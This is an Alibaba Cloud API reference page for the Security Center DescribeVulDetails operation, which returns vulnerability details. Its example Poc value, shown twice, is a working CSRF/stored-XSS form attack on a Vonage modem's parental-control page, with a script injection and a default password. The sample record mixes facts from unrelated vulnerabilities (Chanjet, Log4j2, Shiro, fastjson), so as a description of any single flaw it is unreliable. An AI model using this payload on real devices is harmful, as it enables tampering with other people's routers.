All Products
Search
Document Center

Security Center:DescribeVulDetails

Last Updated:Nov 25, 2024

Queries the details about a vulnerability.

Debugging

You can run this interface directly in OpenAPI Explorer, saving you the trouble of calculating signatures. After running successfully, OpenAPI Explorer can automatically generate SDK code samples.

Authorization information

The following table shows the authorization information corresponding to the API. The authorization information can be used in the Action policy element to grant a RAM user or RAM role the permissions to call this API operation. Description:

  • Operation: the value that you can use in the Action element to specify the operation on a resource.
  • Access level: the access level of each operation. The levels are read, write, and list.
  • Resource type: the type of the resource on which you can authorize the RAM user or the RAM role to perform the operation. Take note of the following items:
    • The required resource types are displayed in bold characters.
    • If the permissions cannot be granted at the resource level, All Resources is used in the Resource type column of the operation.
  • Condition Key: the condition key that is defined by the cloud service.
  • Associated operation: other operations that the RAM user or the RAM role must have permissions to perform to complete the operation. To complete the operation, the RAM user or the RAM role must have the permissions to perform the associated operations.
OperationAccess levelResource typeCondition keyAssociated operation
yundun-sas:DescribeVulDetailsget
*All Resources
*
    none
none

Request parameters

ParameterTypeRequiredDescriptionExample
LangstringYes

The language of the content within the request and response. Valid values:

  • zh: Chinese
  • en: English
zh
TypestringYes

The type of the vulnerability. Valid values:

  • cve: Linux software vulnerability
  • sys: Windows system vulnerability
  • cms: Web-CMS vulnerability
  • app: application vulnerabilitiy
  • emg: urgent vulnerability
  • sca: vulnerability that is detected based on software component analysis
sca
NamestringYes

The name of the vulnerability.

Note You can call the DescribeGroupedVul or DescribeVulList operation to query the names of vulnerabilities.
SCA:ACSV-2020-052801
AliasNamestringYes

The vulnerability announcement.

RHSA-2019:3197-Important: sudo security update
ResourceDirectoryAccountIdlongNo

The Alibaba Cloud account ID of the member in the resource directory.

Note You can call the DescribeMonitorAccounts operation to obtain the IDs.
127608589417****

Response parameters

ParameterTypeDescriptionExample
object

The response parameters.

RequestIdstring

The ID of the request, which is used to locate and troubleshoot issues.

EDA40EA3-6265-5900-AD99-C83E4F109CA8
Cvesarray<object>

The details of the vulnerability.

Cveobject

The details of the vulnerability.

Summarystring

The introduction to the vulnerability.

Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.
Complexitystring

The difficulty level of exploiting the vulnerability. Valid values:

  • LOW
  • MEDIUM
  • HIGH
LOW
Productstring

The service that is affected by the vulnerability.

Log4j2
PocCreateTimelong

The UNIX timestamp when the proof of concept (POC) was created. Unit: milliseconds.

1554189334000
CveIdstring

The Common Vulnerabilities and Exposures (CVE) ID.

CVE-2019-9167
CnvdIdstring

The China National Vulnerability Database (CNVD) ID.

CNVD-2019-9167
Referencestring

The reference of the vulnerability in the Alibaba Cloud vulnerability library. The value is a URL.

https://example.com
CvssScorestring

The Common Vulnerability Scoring System (CVSS) score of the vulnerability in the Alibaba Cloud vulnerability library.

10.0
Vendorstring

The vendor that disclosed the vulnerability.

Apache
PocDisclosureTimelong

The UNIX timestamp when the POC was disclosed. Unit: milliseconds.

1554189334000
Classifystring

The type of the vulnerability.

remote_code_execution
CvssVectorstring

The vector that is used to calculate the CVSS score.

AV:N/AC:L/Au:N/C:C/I:C/A:C
VulLevelstring

The severity of the vulnerability. Valid values:

  • serious
  • high
  • medium
  • low
serious
ReleaseTimelong

The disclosure time that is displayed for the vulnerability in the Alibaba Cloud vulnerability library. The value is a UNIX timestamp. Unit: milliseconds.

1554189334000
Titlestring

The title of the vulnerability announcement.

Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)
Solutionstring

The fixing suggestions of the vulnerability.

<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br />1) Update the latest product patch.↵<br />2) Install anti-virus software and update the virus database in time.↵<br />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>
Contentstring

The CVE content.

Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability Check whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.
Pocstring

The POC content.

NewDomain.html The x and y values will need to be changed accordingly <html> <p>Authenticated Stored CSRF/XSS - Vonage Modem</p> <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic"> <input type="hidden" name="RemoveContentRule" value="0" /> <input type="hidden" name="AddContentRule" value="0" /> <input type="hidden" name="ContentRules" value="0" /> <input type="hidden" name="RuleSelect" value="0" / > <input type="hidden" name="NewKeyword" value="" / > <input type="hidden" name="KeywordAction" value="0" /> <input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" /> <input type="hidden" name="x" value="50" /> <input type="hidden" name="y" value="15" /> <input type="hidden" name="DomainAction" value="1" /> <input type="hidden" name="AllowedDomainAction" value="0" /> <input type="hidden" name="ParentalPassword" value="Broadcom" /> <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" /> <input type="hidden" name="AccessDuration" value="30" /> <input type="submit" title="Exploit" /> </form> </html> NewKeyword.html The x and y values will need to be changed accordingly <html> <p>Authenticated Stored CSRF/XSS - Vonage Modem</p> <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic"> <input type="hidden" name="RemoveContentRule" value="0" /> <input type="hidden" name="AddContentRule" value="0" /> <input type="hidden" name="ContentRules" value="0" /> <input type="hidden" name="RuleSelect" value="0" / > <input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / > <input type="hidden" name="x" value="61" /> <input type="hidden" name="y" value="12" /> <input type="hidden" name="KeywordAction" value="1" /> <input type="hidden" name="NewDomain" value="" /> <input type="hidden" name="DomainAction" value="0" /> <input type="hidden" name="AllowedDomainAction" value="0" /> <input type="hidden" name="ParentalPassword" value="Broadcom" /> <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" /> <input type="hidden" name="AccessDuration" value="30" /> <input type="submit" title="Enable Service" /> </form> </html>
Classifysarray<object>

The vulnerability types.

Classifyobject

The vulnerability type.

Descriptionstring

The description of the vulnerability type.

Remote code execution
Classifystring

The type of the vulnerability.

remote_code_execution
DemoVideoUrlstring

The URL of the demo video for the vulnerability.

https://example.com
OtherIdstring

The ID of the vulnerability.

CVE-2020-8597
InstanceNamestring

The name of the instance.

Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.
sql-test-001
InternetIpstring

The public IP address of the server.

Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.
47.114.XX.XX
IntranetIpstring

The private IP address of the server.

Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.
172.19.XX.XX
TargetIdstring

The ID of the asset that is scanned.

Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.
m-bp17m0pc0xprzbwo****
TargetNamestring

The name of the asset that is scanned.

Note This parameter is deprecated. You can call the DescribeVulList operation to query the instance that is affected by the vulnerability.
frontend

Examples

Sample success responses

JSONformat

{
  "RequestId": "EDA40EA3-6265-5900-AD99-C83E4F109CA8",
  "Cves": [
    {
      "Summary": "Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.",
      "Complexity": "LOW",
      "Product": "Log4j2",
      "PocCreateTime": 1554189334000,
      "CveId": "CVE-2019-9167",
      "CnvdId": "CNVD-2019-9167",
      "Reference": "https://example.com",
      "CvssScore": "10.0",
      "Vendor": "Apache",
      "PocDisclosureTime": 1554189334000,
      "Classify": "remote_code_execution",
      "CvssVector": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
      "VulLevel": "serious",
      "ReleaseTime": 1554189334000,
      "Title": "Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)",
      "Solution": "<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br  />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br  />1) Update the latest product patch.↵<br  />2) Install anti-virus software and update the virus database in time.↵<br  />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br  />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br  />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br  />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br  />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>",
      "Content": "Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability\nCheck whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.",
      "Poc": "NewDomain.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"\" / >\n<input type=\"hidden\" name=\"KeywordAction\" value=\"0\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"test'><script>alert(1)</script>\" />\n<input type=\"hidden\" name=\"x\" value=\"50\" />\n<input type=\"hidden\" name=\"y\" value=\"15\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"1\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Exploit\" />\n</form>\n</html>\n \nNewKeyword.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"test'><script>alert(1)</script>\" / >\n<input type=\"hidden\" name=\"x\" value=\"61\" />\n<input type=\"hidden\" name=\"y\" value=\"12\" />\n<input type=\"hidden\" name=\"KeywordAction\" value=\"1\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Enable Service\" />\n</form>\n</html>",
      "Classifys": [
        {
          "Description": "Remote code execution\n",
          "Classify": "remote_code_execution",
          "DemoVideoUrl": "https://example.com"
        }
      ],
      "OtherId": "CVE-2020-8597",
      "InstanceName": "sql-test-001",
      "InternetIp": "47.114.XX.XX",
      "IntranetIp": "172.19.XX.XX",
      "TargetId": "m-bp17m0pc0xprzbwo****",
      "TargetName": "frontend",
      "CveLink": "https://avd.aliyun.com/detail/CVE-2022-1184"
    }
  ]
}

Error codes

HTTP status codeError codeError messageDescription
400InnerErrorInnerError-
400DataExists%s data exist-
400RdCheckNoPermissionResource directory account verification has no permission.-
403NoPermissioncaller has no permissionYou are not authorized to do this operation.
500RdCheckInnerErrorResource directory account service internal error.-
500ServerErrorServerError-

For a list of error codes, visit the Service error codes.

Change history

Change timeSummary of changesOperation
2024-09-25The Error code has changedView Change Details
2024-09-24The Error code has changedView Change Details
2023-10-24The Error code has changed. The response structure of the API has changedView Change Details
2023-08-07The Error code has changed. The response structure of the API has changedView Change Details
2023-07-20The Error code has changed. The request parameters of the API has changedView Change Details
2023-03-16The Error code has changedView Change Details